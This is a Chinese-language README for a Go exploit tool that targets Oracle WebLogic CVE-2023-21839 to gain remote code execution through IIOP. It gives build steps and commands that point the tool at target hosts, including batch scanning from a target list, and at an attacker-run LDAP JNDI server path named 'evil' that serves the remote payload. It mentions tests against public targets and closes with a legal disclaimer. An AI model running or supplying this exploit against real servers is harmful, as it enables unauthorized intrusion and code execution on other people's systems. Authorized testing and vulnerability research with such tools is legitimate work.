未经授权许可使用本项目攻击或测试目标是非法的,本程序应仅用于授权的安全测试与研究目的
Weblogic CVE-2023-21839 RCE
(1)无需任何 Java 依赖,构造协议通过socket直接RCE
(2)已解决 IIOP 的 NAT 网络问题(可测试 Docker 与公网目标)
(3)在 Windows/Mac OS/Linux 以及 Weblogic 12/14 中测试通过
(4)请使用 JDK 8u191 以下启动 Weblogic 并自行搭建 JNDI Server
Linux/Mac OS
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
Windows
cd cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
新增多目标检测
CVE-2023-21839.exe -file target.txt -ldap ldap://127.0.0.1:1389/evil
target.txt的格式
127.0.0.1:7001
通过ip md5的前五位来定位,部分站点测试会卡死,暂时不知道咋解决 如果发现 panic 或有其他报错,说明目标不存在漏洞(或关闭了 IIOP 功能)
本地测试:
某师傅公网测试:
此工具仅作为网络安全攻防研究交流,请使用者遵照网络安全法合理使用!
如果使用者使用该工具出现任何非法攻击等违法行为,与作者无关!